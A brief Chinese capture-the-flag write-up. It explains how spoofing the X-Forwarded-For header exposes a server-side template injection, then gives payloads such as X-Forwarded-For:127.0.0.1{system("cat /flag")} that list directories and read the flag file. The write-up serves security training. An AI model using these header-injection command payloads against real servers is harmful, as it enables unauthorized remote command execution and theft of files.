当点击flag的时候,弹出ip地址
怀疑需要利用X-Forwarded-For伪造127.0.0.1绕过
使用bp抓包,增加X-Forwarded-For:127.0.0.1,重放
似乎只是将ip回显?通过XFF头来获取信息的,这个IP的值受XFF头控制 。将XFF头改为{2*2}会发现该位置的值变为了4,便可以确定这里存在SSTI
payload:X-Forwarded-For:127.0.0.1{system("ls")}
查看当前目录下的flag.php内是否藏有flag,可惜并不包含
查看根目录
X-Forwarded-For:127.0.0.1{system("ls /")}
获得falg
payload:X-Forwarded-For:127.0.0.1{system("cat /flag")}
